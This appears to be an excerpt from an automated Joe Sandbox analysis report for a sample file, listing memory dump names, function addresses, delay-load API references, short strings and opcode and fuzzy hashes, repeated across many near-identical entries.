Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Fjun7
API String ID: 1269201914-1894352427
Opcode ID: 3e957baf5a1c476cabf278ab2bbd5fcd7c4fc4bea79d142b3cba2c9f5dd23d4f
Instruction ID: 8cfed1db0d98d802ff8ab5ed68b2ffa2c132a30abf874781ede686d4abd40645
Opcode Fuzzy Hash: 3e957baf5a1c476cabf278ab2bbd5fcd7c4fc4bea79d142b3cba2c9f5dd23d4f
Instruction Fuzzy Hash: 24B012C62680047D321761541C02E77011CD0C9F20335D06EF42CC9480E8484C001533

Function 0037E219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: f087345575df9e603e553b687a375f6ce4b195921bb1fee865bef379d8794b38
Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
Opcode Fuzzy Hash: f087345575df9e603e553b687a375f6ce4b195921bb1fee865bef379d8794b38
Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431

Function 0037E27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: 5c732db068bac5f594484c3dca86fc47f020107e08fe9b60d2b6ff98465a974c
Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
Opcode Fuzzy Hash: 5c732db068bac5f594484c3dca86fc47f020107e08fe9b60d2b6ff98465a974c
Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431

Function 0037E25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: 745b1b54aee7b5552107bc6472e74f904f49c534d03b6f1013c4876e6265ba7a
Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
Opcode Fuzzy Hash: 745b1b54aee7b5552107bc6472e74f904f49c534d03b6f1013c4876e6265ba7a
Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431

Function 0037E2B9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: 18cb1eef8867841742b7b4a4a84ac757b29cc22b050644538fd383be55707ee5
Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
Opcode Fuzzy Hash: 18cb1eef8867841742b7b4a4a84ac757b29cc22b050644538fd383be55707ee5
Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431

Function 0037E2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: 22bd651eca46618d5b2dab4008c7070a274bedc8ae505ac4162cb80fa9eca2ae
Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
Opcode Fuzzy Hash: 22bd651eca46618d5b2dab4008c7070a274bedc8ae505ac4162cb80fa9eca2ae
Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431

Function 0037E2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: d1573c258c6e8a3211ab3f316682c53a825e457a530707c94f37502a6d6ec4bd
Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
Opcode Fuzzy Hash: d1573c258c6e8a3211ab3f316682c53a825e457a530707c94f37502a6d6ec4bd
Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431

Function 0037E291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: 76576aa31aab6f68b3c586500a43762c6f59c556c3e9fdc4953eb1f572d7d3da
Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
Opcode Fuzzy Hash: 76576aa31aab6f68b3c586500a43762c6f59c556c3e9fdc4953eb1f572d7d3da
Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431

Function 0037E29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: 04d0381f43f7e33322dea378b08547f1b8f7f18862ceab17961ff59fd543e32e
Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
Opcode Fuzzy Hash: 04d0381f43f7e33322dea378b08547f1b8f7f18862ceab17961ff59fd543e32e
Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431

Function 0037E2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: 4915e8eed571b7775cd2567c810973427265c4577e8a6ae4b324cf556917feb5
Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
Opcode Fuzzy Hash: 4915e8eed571b7775cd2567c810973427265c4577e8a6ae4b324cf556917feb5
Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431

Function 0037E2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: d7a4a31f9cf13a09d668994b5c1ff86ccb3453c43edfe2be29a5ea331c25d44d
Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
Opcode Fuzzy Hash: d7a4a31f9cf13a09d668994b5c1ff86ccb3453c43edfe2be29a5ea331c25d44d
Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431

Function 0037E2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: 2998f0dcb728a8608b01df7f6bb7cd986e4c8a9039b950dff472fc96872b9b78
Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
Opcode Fuzzy Hash: 2998f0dcb728a8608b01df7f6bb7cd986e4c8a9039b950dff472fc96872b9b78
Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431

Function 0037E573 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E580

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

Fjun7, xrefs: 0037E57A

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Fjun7
API String ID: 1269201914-1894352427
Opcode ID: baabbf9866b22ad5f734647bc8d4d2b6ce4e30dac901495b4444682bf1774e6b
Instruction ID: bfe368a8bb96d25d90e7fdc83991dcc795105360216e6ecf41d5710a814f4f1c
Opcode Fuzzy Hash: baabbf9866b22ad5f734647bc8d4d2b6ce4e30dac901495b4444682bf1774e6b
Instruction Fuzzy Hash: 81A011C22A80003C322A22A02C02C3B022CC0CAF22330E2AEF82888880A88808002832

Function 0037E569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E51F

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

PDu<7, xrefs: 0037E519

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDu<7
API String ID: 1269201914-3110419215
Opcode ID: d9975607682afbe1b7a58b3cb9c54b5a0a7126ed5fdff5a79a3871d5197dc863
Instruction ID: ecaabe679715f73942fb277e498379dd2febd26736637ee83140ec754053ba99
Opcode Fuzzy Hash: d9975607682afbe1b7a58b3cb9c54b5a0a7126ed5fdff5a79a3871d5197dc863
Instruction Fuzzy Hash: 70A011CA2A8002BC322A22002E02C3B022CC0CAF20330E8AEF82A88880A8880C000832

Function 0037E555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E51F

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

PDu<7, xrefs: 0037E519

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDu<7
API String ID: 1269201914-3110419215
Opcode ID: 571c725a5bcee770ffaf5f743163c1f3d243b04431804789a215354d77650e5f
Instruction ID: ecaabe679715f73942fb277e498379dd2febd26736637ee83140ec754053ba99
Opcode Fuzzy Hash: 571c725a5bcee770ffaf5f743163c1f3d243b04431804789a215354d77650e5f
Instruction Fuzzy Hash: 70A011CA2A8002BC322A22002E02C3B022CC0CAF20330E8AEF82A88880A8880C000832

Function 0037E55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E51F

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

PDu<7, xrefs: 0037E519

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDu<7
API String ID: 1269201914-3110419215
Opcode ID: ba6b89382cce1a9ecacd00a92e91135d67e0a0797bece91ee3bc4fcf4f330465
Instruction ID: ecaabe679715f73942fb277e498379dd2febd26736637ee83140ec754053ba99
